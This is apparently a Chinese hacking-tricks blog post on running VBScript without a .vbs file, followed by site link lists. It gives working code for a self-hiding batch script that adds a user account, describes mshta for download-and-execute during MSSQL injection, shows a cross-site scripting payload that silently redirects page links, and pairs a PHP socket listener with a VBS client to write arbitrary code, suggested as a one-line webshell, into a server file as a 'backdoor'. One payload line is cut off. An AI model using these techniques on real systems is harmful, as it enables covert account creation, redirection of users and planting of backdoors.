非常棒的lcx寫的非常規(guī)運行vbs
這個組件在xp、2003上默認都可以用的,調(diào)用后可以聽到電腦上一個國外老男人在說話。好比這樣一句代碼:●CreateObject("SAPI.SpVoice").Speak "I LOVE YOU"●,保存成vbs后綴后雙擊就會聽到英語的我愛你了。但隨之而來我們講到另一個問題,不保存成vbs或vbe后綴如何運行vbs代碼。
一、用mshta來運行vbs
hta這種類型的文件運行后也是系統(tǒng)權(quán)限,其調(diào)用宿主就是mshta.exe。我們在cmd下運行這樣一行代碼:●mshta vbscript:createobject("sapi.spvoice").speak("I LOVE YOU.")(window.close)●,也會聽到同樣的發(fā)音。這行代碼的意思類似是臨時生成一個hta文件,然后運行里邊的vbs代碼,再調(diào)用window.close將運行窗口關(guān)掉。整個運行過程是看不到hta窗口的。這種運行方式你會想到什么?最少我是想到了兩個。一個是批處理的隱藏運行,基本代碼如下:
★
@echo off
if "%1" == "h" goto begin
mshta vbscript:createobject("wscript.shell").run("%~nx0 h",0)(window.close)&&exit
:begin
rem 下邊開始寫批處代碼了
net user lcx 12345 /add
★
這個代碼只能雙擊運行,運行過程中你看不到具體的批處理運行流程的。第二個我想的是注射過程中的用途。網(wǎng)上有篇流傳很廣的文章《mssql注射中多次調(diào)用參數(shù)導(dǎo)致多次echo的解決方法》,中心思想是將vbs語句用冒號連接起來然后用echo命令一次寫入到被注入的肉雞上,然后再調(diào)用這個vbs來下載文件。如果調(diào)用mshta執(zhí)行的話,下載、執(zhí)行一次就ok了。不過在命令行下用mshta后邊直接跟vbs代碼有個難處理的問題是空格,不過這個好解決用execute將vbs代碼放在括號里就ok了,這個讀者可以親自去試一下了,相信我不難的。
二、用ie地址欄運行vbs
很多人會用ie地址欄運行js,其實vbs一樣是可以的,我們隨便打開一個網(wǎng)站,在地址欄上輸入:vbscript:msgbox(Document.links.length)后回車,就會看到當(dāng)前頁面有多少個連接了。用document.links(i).href這句的話,將i換成不同的自然數(shù)好比0、1、2、3等就會分別顯示出不同的鏈接地址。這部份內(nèi)容其實是涉及到dhtml的內(nèi)容了。我們來看一個最簡單的示例代碼:
★
<a href=http://www.sohu.com>www.sohu.com</a>
<a href=http://www.baidu.com>www.baidu.com</a>
★
這是兩個鏈接,保存成網(wǎng)頁后點擊就會跳轉(zhuǎn)到不同的頁面。如果這個頁面有跨站,我想搞下破壞,讓用戶點擊www.sohu.com卻跑到我指定的頁面上能做到嗎?其實可以的,只要加一行語句就可以了,代碼是:●<body onload='vbscript:document.links(0).>●。這樣的話用戶再點擊sohu其實會跑到google上去了,原來頁面的版式卻絲毫沒有破壞。同樣的dhtml元素還有document.links(i).href、document.images(i).src、document.forms(i).action等等,跨站改變其動態(tài)元素是很好玩的。
三、調(diào)用外部組件來運行vbs
vbs本身功能畢竟有限,但是卻可以很好的與外部交互。要是用vbs來模擬nc發(fā)包的話,就要調(diào)用vb組件了。關(guān)于VBS如何成功調(diào)用MSWinsock.Winsock,zzzevazzz說的很清楚了。就是下載Winsock.ocs注冊,和VB6控件的授權(quán)密鑰的.reg導(dǎo)入注冊表。兩個文件可以在http://zzzevazzz.bokee.com/inc/vb6controls.rar這里下載。前不久學(xué)了一段時間php,網(wǎng)上看到一個php的監(jiān)聽程序,可以用它來做一個后門,s端s.php代碼如下:
★
<?
// 設(shè)置一些基本的變量
$host = "192.168.8.100";
$port = 12345;
// 設(shè)置超時時間
set_time_limit(0);
// 創(chuàng)建一個Socket
$socket = socket_create(AF_INET, SOCK_STREAM, 0) or die("Could not create
socket\n");
//綁定Socket到端口
$result = socket_bind($socket, $host, $port) or die("Could not bind to
socket\n");
// 開始監(jiān)聽鏈接
$result = socket_listen($socket, 3) or die("Could not set up socket
listener\n");
// accept incoming connections
// 另一個Socket來處理通信
$spawn = socket_accept($socket) or die("Could not accept incoming
connection\n");
// 獲得客戶端的輸入
$input = socket_read($spawn, 1024) or die("Could not read input\n");
// 清空輸入字符串
$input = trim($input);//將輸入結(jié)果寫入ok.php,這句是我加的
fputs(fopen('ok.php','a+'),"$input");
//處理客戶端輸入并返回結(jié)果
$output = strrev($input) . "\n";
socket_write($spawn, $output, strlen ($output)) or die("Could not write
output\n");
// 關(guān)閉sockets
socket_close($spawn);
socket_close($socket);
?>
★
在ie打開這個php,運行它的服務(wù)器會監(jiān)聽12345端口。如果我們再用vbs向12345端口發(fā)包的話,在同文件的php目錄下會生成ok.php。發(fā)包的內(nèi)容就是我們要寫入ok.php的代碼。該vbs文件c.vbs代碼如下:
★
Set ie=WScript.CreateObject("InternetExplorer.Application")
ie.visible=false
ie.Navigate "http://192.168.8.100/s.php" 's.php是服務(wù)端
While ie.Busy
WScript.Sleep 100
Wend
Do
Wscript.Sleep 200
Loop Until ie.ReadyState=4
Set socket=WScript.CreateObject("MSWinsock.Winsock")
socket.Protocol=0
socket.RemotePort="12345" '端口
socket.RemoteHost="192.168.8.100" '主機
socket.connect socket.RemoteHost, socket.RemotePort '連接
WScript.sleep 10
ddd="<?phpinfo();>"&Chr(13) '這里你可以改成一句話的php木馬
socket.SendData ddd
WScript.sleep 100
wscript.echo "ok"
'socket.senddata Chr(13)
socket.close
Set ie=nothing
★
一個vbs和一個php珠聯(lián)璧合,打造了一個非常規(guī)后門。當(dāng)然這個后門的價值不大,但重要的是思路,不是嗎?
您可能感興趣的文章
- 01-10下載文件到本地運行的vbs
- 01-10什么是一個高效的軟件
- 01-10VBS中的正則表達式的用法大全 <font color=red>原創(chuàng)&
- 01-10VBS中SendKeys的基本應(yīng)用
- 01-10VBS中Select CASE的其它用法
- 01-10VBScript的入門學(xué)習(xí)資料
- 01-10VBScript教程 第十二課VBScript頁面的簡單樣例
- 01-10VBS教程:正則表達式簡介
- 01-10VBS教程:方法-Copy 方法
- 01-10VBS教程:方法-Move 方法


閱讀排行
本欄相關(guān)
- 01-10下載文件到本地運行的vbs
- 01-10飄葉千夫指源代碼,又稱qq刷屏器
- 01-10SendKeys參考文檔
- 01-10什么是一個高效的軟件
- 01-10VBS中的正則表達式的用法大全 &l
- 01-10exe2swf 工具(Adodb.Stream版)
- 01-10VBS中SendKeys的基本應(yīng)用
- 01-10用VBSCRIPT控制ONSUBMIT事件
- 01-10VBScript教程 第十一課深入VBScript
- 01-10VBScript語法速查及實例說明
隨機閱讀
- 01-10delphi制作wav文件的方法
- 08-05DEDE織夢data目錄下的sessions文件夾有什
- 01-11Mac OSX 打開原生自帶讀寫NTFS功能(圖文
- 04-02jquery與jsp,用jquery
- 01-10SublimeText編譯C開發(fā)環(huán)境設(shè)置
- 08-05dedecms(織夢)副欄目數(shù)量限制代碼修改
- 01-10C#中split用法實例總結(jié)
- 08-05織夢dedecms什么時候用欄目交叉功能?
- 01-10使用C語言求解撲克牌的順子及n個骰子
- 01-11ajax實現(xiàn)頁面的局部加載